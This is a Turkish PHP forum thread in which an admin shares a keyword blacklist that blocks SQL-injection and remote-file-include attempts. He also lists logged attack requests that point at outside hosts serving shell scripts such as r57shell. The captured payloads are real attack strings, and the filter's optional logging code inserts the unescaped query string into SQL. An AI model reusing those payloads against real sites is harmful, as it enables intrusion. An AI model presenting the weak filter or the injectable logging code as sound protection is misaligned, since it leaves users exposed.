Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 1260
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 acil web sayfa boyutu ner..
(5109 okuma, 3 yanıt)
 uye adina gore veri cekme..
(4286 okuma, 1 yanıt)
 Ajax vb. Manşet Scripti?..
(5195 okuma, 2 yanıt)
 Random banner nasıl yapar..
(3949 okuma, 1 yanıt)
 Veritabanına Alan Eklemek..
(3498 okuma, 0 yanıt)
 downlaod sitesi için hazı..
(7350 okuma, 7 yanıt)
 popup sayfa lütfen yardım..
(3732 okuma, 0 yanıt)
 youtube indirici getten g..
(5875 okuma, 2 yanıt)
 Hicri Takvime göre Tarih ..
(3208 okuma, 0 yanıt)
 Telefon Rehberi..
(3653 okuma, 0 yanıt)
 dosya indirirken 10 saniy..
(4037 okuma, 2 yanıt)
 switch komutu çalıştırama..
(3504 okuma, 0 yanıt)
 Bu kodun neresine rel=nof..
(7267 okuma, 8 yanıt)
 include ve require kod ha..
(7649 okuma, 8 yanıt)
 Remote File İnclude - RFI..
(6047 okuma, 4 yanıt)
 php de form dan gönderile..
(6555 okuma, 5 yanıt)
 Otomatik Şifre Üretimi..
(4249 okuma, 1 yanıt)
 PHP ile resim boyutu ayar..
(7264 okuma, 4 yanıt)
 Rastgele Şifre Üretmek..
(4330 okuma, 2 yanıt)
 klasördeki resimleri php ..
(9252 okuma, 9 yanıt)
 PHP Bilgisini Öğrenelim..
(11749 okuma, 12 yanıt)
 Php Ekşin - Php'ye Giriş ..
(5889 okuma, 4 yanıt)
 firefox harici kişilere &..
(3782 okuma, 0 yanıt)
 BB-Code Fonksiyonu..
(4869 okuma, 2 yanıt)
 PHP ile PNG resim oluştur..
(5499 okuma, 2 yanıt)
 Rastgele Şifre Üretmek..
(7324 okuma, 5 yanıt)
 Dizin okuma,dosyalarıdizm..
(3805 okuma, 0 yanıt)
 PHP'nin Yapı Taşları..
(4121 okuma, 0 yanıt)
 Php ye giriş..
(4351 okuma, 0 yanıt)
 Google gibi Otomatik dil ..
(9741 okuma, 11 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Remote File İnclude - RFI Açığı + Sql Injeksıyon
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Remote File İnclude - RFI Açığı + Sql Injeksıyon

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> PHP -> PHP Kod Örnekleri
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
saho
Forum Yöneticisi
Forum Yöneticisi





Kayıt: Mar 18, 2005
Mesajlar: 2176
Konum: istanbul-tokat

MesajTarih: 2007-08-28, 00:25:03    Mesaj konusu: Remote File İnclude - RFI Açığı + Sql Injeksıyon Alıntıyla Cevap Gönder

bir nebzede olsa bu açıkları engellemek için bir kod bölütü nuke içinde bulunuyordu az gelişmiş hali :p

Kod:
if(!function_exists('stripos')) {//stripos fonk varmı yok mu diye bakıyoruz
  function stripos_clone($haystack, $needle, $offset=0) {
    return strpos(strtoupper($haystack), strtoupper($needle), $offset);//yoksa strips_clone u tanımladık
  }
} else {
  function stripos_clone($haystack, $needle, $offset=0) {
    return stripos($haystack, $needle, $offset=0);
  }
}
if(isset($_SERVER['QUERY_STRING'])) {//isset ile bir sorgu gelmiş mi dedik geldiyse işimize devam ediyoruz
$queryString = strtolower($_SERVER['QUERY_STRING']);//sürekli uzun yazıyı yazmamak için az kısalttık
    if (stripos_clone($queryString,'%select%20') OR stripos_clone($queryString,'%20union%20') OR stripos_clone($queryString,'union/*') OR stripos_clone($queryString,'c2nyaxb0') OR stripos_clone($queryString,'+union+') OR stripos_clone($queryString,'http://') OR stripos_clone($queryString,'https://') OR (stripos_clone($queryString,'cmd=') AND !stripos_clone($queryString,'&cmd')) OR (stripos_clone($queryString,'exec') AND !stripos_clone($queryString,'execu')) OR stripos_clone($queryString,'union') OR stripos_clone($queryString,'concat') OR stripos_clone($queryString,'ftp://')) {
        $ip = $_SERVER['REMOTE_ADDR'];
        $sayfa = $queryString;
        $time = time();
/* sql e verileri işlemek isterseniz buraya giriş kodları sql yapısı ise
CREATE TABLE `ban` (
  `id` int(250) NOT NULL auto_increment,
  `ip` varchar(250) collate latin5_bin NOT NULL default '0',
  `sayfasi` varchar(250) collate latin5_bin NOT NULL default '',
  `zaman` varchar(250) collate latin5_bin NOT NULL default '',
  PRIMARY KEY  (`id`)
) ENGINE=MyISAM ;
$sql = "INSERT INTO ban VALUES (NULL,'$ip','$sayfa', '$time')";
$query = mysql_query($sql);
*/
      die('<title>AMAN ALLAH\'IM HACKER N\'OLUR BENİ HACKLAMA</title><center>AMAN ALLAH\'IM HACKER N\'OLUR BENİ HACKLAMA<BR><BR><img src=imajlar/bandik.gif><br><br>Yapmaya çalıştığınız işlem; <b>'.$queryString.'</b><br> Ip niz<b>; '.$ip.'</b><br><br>lamerlik sağlığa zararlıdır.</center>');//die mesajı
    unset($queryString);// değişkeni bellekten kaldır
exit;//aşağısındaki tüm kodların çalışmasını die iptal etti ama yinede işimizi garantiye alıp exit; yaptık
}

yakaladığım bazı lamerler
Kod:
INSERT INTO `ban` VALUES (19, '201.43.54.9', 'action=http://yem.wpc.or.kr/event_popup/2000603japan/0603japan.files/slide0013_image112.jpg?&cmd=id', '1156264412');
INSERT INTO `ban` VALUES (21, '62.94.78.208', 'l=http://84.19.178.60/~sky/dir/ex.txt?', '1158662636');
INSERT INTO `ban` VALUES (22, '62.23.104.90', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158857954');
INSERT INTO `ban` VALUES (23, '69.94.12.137', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158857966');
INSERT INTO `ban` VALUES (24, '69.94.12.137', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158857966');
INSERT INTO `ban` VALUES (25, '212.34.136.15', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158858011');
INSERT INTO `ban` VALUES (26, '62.23.104.90', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158858023');
INSERT INTO `ban` VALUES (27, '69.94.12.137', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158858038');
INSERT INTO `ban` VALUES (28, '69.94.12.137', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158858041');
INSERT INTO `ban` VALUES (29, '201.238.231.66', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158858043');
INSERT INTO `ban` VALUES (30, '201.238.231.66', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158858045');
INSERT INTO `ban` VALUES (31, '62.23.104.90', 'k=http://www.moondremi.co.kr/kboard/data/power/ice.dat?', '1158858091');
INSERT INTO `ban` VALUES (32, '201.28.202.17', 'func=http://myspace.si/images/delete.gif??', '1159528932');
INSERT INTO `ban` VALUES (33, '87.8.117.67', 'action=http://busca.uol.com.br/uol/index.html?&cmd=id&id=13', '1161170373');
INSERT INTO `ban` VALUES (34, '87.8.117.67', 'action=view&id=http://busca.uol.com.br/uol/index.html?&cmd=id', '1161170373');
INSERT INTO `ban` VALUES (35, '87.2.182.188', 'action=http://busca.uol.com.br/uol/index.html?&cmd=id&amp;by=a', '1163459067');
INSERT INTO `ban` VALUES (36, '194.150.108.158', 'func=http://www.inprocon-deutschland.de/images/cc.txt?', '1165604544');
INSERT INTO `ban` VALUES (37, '85.99.51.101', 'action=http://bolivar44.byethost9.com/r57shell.txt?', '1166196248');
INSERT INTO `ban` VALUES (38, '64.186.239.116', 'action=view&id=8//index2.php?_request=&_request[option]=com_content&_request[itemid]=1&globals=&mosconfig_absolute_path=http://rds.ene.unb.br/rds/.../a/echo4?', '1182635888');
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-21, 10:48:19    Mesaj konusu: Forum Arası Reklamlar


Başa dön
Kokoin
Mesaj: 1+
Mesaj: 1+





Kayıt: Jun 16, 2008
Mesajlar: 3

MesajTarih: 2008-06-16, 23:06:05    Mesaj konusu: Alıntıyla Cevap Gönder

tee 2005 te yazmışın ve kimse bi cvp yazmamış.. acaba konumu yetersiz kalmış yoksa senmi uygun anlatamamışın anlayamadım.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
saho
Forum Yöneticisi
Forum Yöneticisi





Kayıt: Mar 18, 2005
Mesajlar: 2176
Konum: istanbul-tokat

MesajTarih: 2008-06-22, 11:10:29    Mesaj konusu: ss Alıntıyla Cevap Gönder

diğer konunuda da rezil olmuşsun daha kayıt tarihi ile mesaj tarihini bilmiyorsun ve amacın ney yazmaktaki anlamadım ki sadece php kod örneği kimsenin sorusu yok demiş ki :p
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
ultrAslanYavuz
Tema Sorumlusu
Tema Sorumlusu





Kayıt: Jun 25, 2006
Mesajlar: 1217

MesajTarih: 2008-06-22, 11:38:31    Mesaj konusu: Alıntıyla Cevap Gönder

Very HappyVery Happy
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
aynaliz
Mesaj: 500+
Mesaj: 500+





Kayıt: Sep 01, 2006
Mesajlar: 791

MesajTarih: 2008-06-23, 02:30:05    Mesaj konusu: Alıntıyla Cevap Gönder

Benim siteye de SQL İnjeksiyon ile nuke_authors tablosu üzerinden admin panelini hacklemeye çalıştılar prefixleri değiştirmişdim..

Ve son noktayı protector koydu ve lamerleri şutladı ve goooollll.. Very Happy Very Happy
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> PHP -> PHP Kod Örnekleri Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Bir modülün admin file'ını kullanıcıl... deviLinsidE Php Nuke Sorunlarınız 1 2010-07-16, 12:26:25 Son Mesajı Görüntüle
Yeni mesaj yok You can't access this file directly..... hulyamm Php Nuke Sorunlarınız 1 2010-04-17, 16:23:16 Son Mesajı Görüntüle
Yeni mesaj yok The previous file could not be placed... fuatkose Php Nuke Modülleri 3 2010-01-11, 13:57:00 Son Mesajı Görüntüle
Yeni mesaj yok Kullanışlı bir açığı olmayan video m... Sergen Php Nuke Modülleri 8 2009-12-20, 18:56:46 Son Mesajı Görüntüle
Yeni mesaj yok nsn news Illegal File Access Detected!! karadag Php Nuke Modülleri 3 2009-11-17, 01:21:52 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright